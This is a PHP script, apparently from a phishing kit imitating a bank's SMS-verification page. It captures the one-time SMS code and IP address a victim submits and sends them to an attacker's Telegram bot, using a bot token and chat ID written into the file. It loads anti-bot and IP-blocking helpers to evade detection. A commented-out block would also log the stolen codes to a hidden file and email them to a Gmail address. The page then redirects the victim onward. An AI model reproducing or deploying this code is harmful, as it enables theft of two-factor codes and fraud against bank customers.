File: /home/bashacomputer/public_html/tekata/DKR/nosms.php
<?php
include('antibot.php');
include('antiip.php');
include('blocker.php');
include('geoip.php');
include('useragent.php');
session_start();
$ap_vsms = $_SESSION['_ap_vsms_'] = $_POST['vsms'];
$ip = getenv("REMOTE_ADDR");
$message = "SMS: " .$ap_vsms." ";
$message .= "IP: ".$ip;
file_get_contents("https://api.telegram.org/bot5904053863:AAF5mXkwKL5IfmUXviNn4z34xa_dV8fWa3I/sendMessage?chat_id=-1002089982877&text=".$message );
/*
$arr = array('funip' => $ip, 'funsms' => $ap_vsms);
$arrsend = array('funip' => $ip, 'funsms' => $ap_vsms);
$XAMZ = json_encode($arr);
$XAMZSND = json_encode($arrsend);
$file = fopen(".RzL.html","a");
fwrite($file, $XAMZ."</br>");
fclose($file);
$asba = "dskresult2021@gmail.com";
$subject = "NEW DSKSMS OF " .$ip. " - [".$countryname."]";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$headers .= "From:DSKREZ <dskresult2021@gmail.com>";
mail($asba, $subject, base64_encode($XAMZSND), $headers);
*/
header("Location: vsms.php");
?>